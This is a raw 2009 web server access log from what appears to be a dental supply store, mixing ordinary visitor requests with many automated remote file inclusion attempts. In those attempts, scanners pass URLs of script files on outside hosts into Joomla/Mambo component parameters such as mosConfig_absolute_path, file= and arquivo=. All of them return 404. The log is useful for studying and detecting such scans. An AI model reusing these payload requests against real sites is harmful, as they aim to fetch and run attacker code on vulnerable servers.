66.27.196.133 - - [28/Oct/2009:00:46:17 -0400] "GET /images/items/45415201_THUMB.JPG HTTP/1.1" 200 14626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:17 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:17 -0400] "GET /images/items/TRUSCREWS_THUMB.JPG HTTP/1.1" 200 15579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:20 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F2E501E10450041F908J+M37+ENG HTTP/1.1" 200 63451 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
62.140.23.192 - - [28/Oct/2009:00:46:41 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.27.196.133 - - [28/Oct/2009:00:46:42 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F2E501E10450041F908J+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:46:43 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
62.140.23.192 - - [28/Oct/2009:00:46:43 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
174.143.3.188 - - [28/Oct/2009:00:46:55 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Avant Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [28/Oct/2009:00:46:55 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [28/Oct/2009:00:46:55 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
174.143.3.188 - - [28/Oct/2009:00:46:55 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
62.140.23.192 - - [28/Oct/2009:00:48:05 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:48:05 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:00:48:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [28/Oct/2009:00:48:07 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:48:18 -0400] "GET /logs/access_log.Q109071700//components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:48:24 -0400] "GET /logs/access_log.Q109092500//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:48:24 -0400] "GET //include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:48:24 -0400] "GET /logs//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:48:38 -0400] "GET /logs/error_log.Q109060800%20%20/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:48:38 -0400] "GET /logs/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:48:38 -0400] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:48:46 -0400] "GET /logs/access_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:48:46 -0400] "GET /index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:48:46 -0400] "GET /logs/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:48:48 -0400] "GET /logs/access_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:48:48 -0400] "GET /index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:48:48 -0400] "GET /logs/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:48:56 -0400] "GET /logs/access_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:48:56 -0400] "GET /index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:48:56 -0400] "GET /logs/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
222.73.17.7 - - [28/Oct/2009:00:49:01 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:01 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:01 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:01 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:01 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:01 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:49:02 -0400] "GET /logs/error_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
222.73.17.7 - - [28/Oct/2009:00:49:05 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:05 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:05 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:05 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:05 -0400] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:05 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:05 -0400] "GET /logs/access_log.Q109062900%20%20//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:49:05 -0400] "GET /logs/access_log.Q109052400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:49:05 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:49:05 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:05 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:49:06 -0400] "GET /logs/error_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
222.73.17.7 - - [28/Oct/2009:00:49:07 -0400] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:07 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.93.131.94 - - [28/Oct/2009:00:49:11 -0400] "GET /logs/error_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
222.73.17.7 - - [28/Oct/2009:00:49:13 -0400] "GET /logs/access_log.Q109071700%20%20//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:14 -0400] "GET /logs/access_log.Q109071700%20%20//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:49:16 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:49:16 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:49:20 -0400] "GET /logs/access_log.Q109052400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.72.215.82 - - [28/Oct/2009:00:49:20 -0400] "GET /logs/access_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
222.73.17.7 - - [28/Oct/2009:00:49:20 -0400] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:21 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.27.196.133 - - [28/Oct/2009:00:49:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
66.27.196.133 - - [28/Oct/2009:00:49:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; MySpace;; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8; MySpace;)"
69.72.215.82 - - [28/Oct/2009:00:49:21 -0400] "GET /index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:49:22 -0400] "GET /logs/access_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:49:22 -0400] "GET /logs/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:49:22 -0400] "GET /index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:49:24 -0400] "GET /logs/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
222.73.17.7 - - [28/Oct/2009:00:49:25 -0400] "GET /logs/access_log.Q109071700//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:25 -0400] "GET /logs/access_log.Q109071700//components/com_flyspray/startdown.php?file=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.135.218.37 - - [28/Oct/2009:00:49:27 -0400] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.135.218.37 - - [28/Oct/2009:00:49:27 -0400] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:29 -0400] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.73.17.7 - - [28/Oct/2009:00:49:29 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:30 -0400] "GET //include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:32 -0400] "GET //include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:33 -0400] "GET //include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:33 -0400] "GET //include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:33 -0400] "GET //include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:34 -0400] "GET /logs//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:34 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:37 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:37 -0400] "GET /logs//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:39 -0400] "GET /logs//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:39 -0400] "GET /logs//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:39 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:39 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:40 -0400] "GET /logs//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:40 -0400] "GET /logs/access_log.Q109092500%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.72.215.82 - - [28/Oct/2009:00:49:41 -0400] "GET /logs/error_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
